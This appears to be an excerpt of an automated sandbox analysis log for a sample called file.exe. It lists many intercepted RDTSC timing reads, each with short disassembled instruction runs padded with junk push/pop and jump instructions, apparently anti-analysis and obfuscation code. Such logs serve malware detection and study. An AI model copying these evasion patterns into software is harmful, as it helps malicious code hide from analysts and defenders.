              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C0E second address: 7C6C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C12 second address: 7C6C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C2E second address: 7C6C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F4F3CC87F76h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C51 second address: 7C6C70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4F3C50B5E1h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C70 second address: 7C6C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F4F3CC87F7Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C91 second address: 7C6C9D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3C50B5DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6DEC second address: 7C6DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6F76 second address: 7C6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6F90 second address: 7C6FE4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4F3CC87F7Bh 0x00000008 jnc 00007F4F3CC87F76h 0x0000000e pop edi 0x0000000f jmp 00007F4F3CC87F84h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jg 00007F4F3CC87F7Ah 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 jg 00007F4F3CC87F87h 0x00000027 jmp 00007F4F3CC87F7Fh 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC57 second address: 7CBC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F4F3C50B5D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC64 second address: 7CBC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC6A second address: 7CBC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC7C second address: 7CBC80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC80 second address: 7CBCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F3C50B5DAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBCAB second address: 7CBCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBCB1 second address: 7CBCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F4F3C50B5D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBCBE second address: 7CBCDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4F3CC87F82h 0x00000008 pushad 0x00000009 jns 00007F4F3CC87F76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBCDB second address: 7CBCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBE44 second address: 7CBE49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBF85 second address: 7CBF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC94E second address: 7CC952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CCC39 second address: 7CCC43 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD091 second address: 7CD0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jg 00007F4F3CC87F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD0A3 second address: 7CD0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D34B0 second address: 7D34BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D34BC second address: 7D34C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D34C1 second address: 7D34DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 jo 00007F4F3CC87F76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D34DF second address: 7D3509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4F3C50B5D8h 0x00000013 jmp 00007F4F3C50B5E5h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3509 second address: 7D353E instructions: 0x00000000 rdtsc 0x00000002 js 00007F4F3CC87F8Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F4F3CC87F82h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4F3CC87F87h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2D5F second address: 7D2D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4F3C50B5E5h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2D80 second address: 7D2D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2D84 second address: 7D2D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2D8A second address: 7D2D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2D8F second address: 7D2D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4F3C50B5D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2EDE second address: 7D2EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2EE4 second address: 7D2EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2EE9 second address: 7D2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4F3CC87F76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D2EF5 second address: 7D2EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3069 second address: 7D3071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3071 second address: 7D307B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D598F second address: 7D5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5993 second address: 7D59A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D551E second address: 7D5524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5524 second address: 7D5528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5528 second address: 7D553B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D553B second address: 7D5565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F4F3C50B5F2h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5565 second address: 7D557B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4F3CC87F76h 0x0000000a jmp 00007F4F3CC87F7Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D927A second address: 7D9293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4F3C50B5E0h 0x0000000c jmp 00007F4F3C50B5DAh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D958B second address: 7D9591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9591 second address: 7D959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4F3C50B5D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD959 second address: 7DD993 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jo 00007F4F3CC87F76h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 js 00007F4F3CC87F8Ch 0x0000001a jmp 00007F4F3CC87F84h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 jc 00007F4F3CC87F7Eh 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DCC25 second address: 7DCC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DCC29 second address: 7DCC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F4F3CC87F7Eh 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 js 00007F4F3CC87F76h 0x00000018 jmp 00007F4F3CC87F7Eh 0x0000001d pop esi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD1AE second address: 7DD1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD1B3 second address: 7DD1B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD1B8 second address: 7DD1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD1BE second address: 7DD1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3CC87F76h 0x0000000a popad 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F4F3CC87F7Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4F3CC87F7Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD1EF second address: 7DD1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD4E3 second address: 7DD4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD4EF second address: 7DD4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD4F5 second address: 7DD50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3CC87F84h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD50F second address: 7DD513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1F00 second address: 7E1F1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F4F3CC87F7Bh 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1F1A second address: 7E1F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1F20 second address: 7E1F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E21E7 second address: 7E21ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E21ED second address: 7E2203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E24CB second address: 7E24E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3C50B5DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E24E3 second address: 7E24F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F81h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E24F8 second address: 7E24FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2795 second address: 7E2799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA08E second address: 7EA0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F4F3C50B5E1h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA410 second address: 7EA41A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA41A second address: 7EA41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA78B second address: 7EA795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA795 second address: 7EA799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA799 second address: 7EA7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA7A5 second address: 7EA7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA7AA second address: 7EA7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA7B9 second address: 7EA7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB040 second address: 7EB048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB048 second address: 7EB052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3C50B5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB35D second address: 7EB366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB60A second address: 7EB60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB60E second address: 7EB631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4F3CC87F7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F3CC87F7Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB631 second address: 7EB635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0D2F second address: 7F0D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F00E8 second address: 7F0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jng 00007F4F3C50B5D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F4F3C50B5E4h 0x00000018 jmp 00007F4F3C50B5E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0127 second address: 7F013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3CC87F76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4F3CC87F76h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F013C second address: 7F0144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0144 second address: 7F0153 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4F3CC87F7Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F02CB second address: 7F02DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3C50B5DBh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06F0 second address: 7F06F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06F4 second address: 7F06FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06FA second address: 7F0717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4F3CC87F85h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0717 second address: 7F0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F09E4 second address: 7F09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD84F second address: 7FD87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4F3C50B5DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
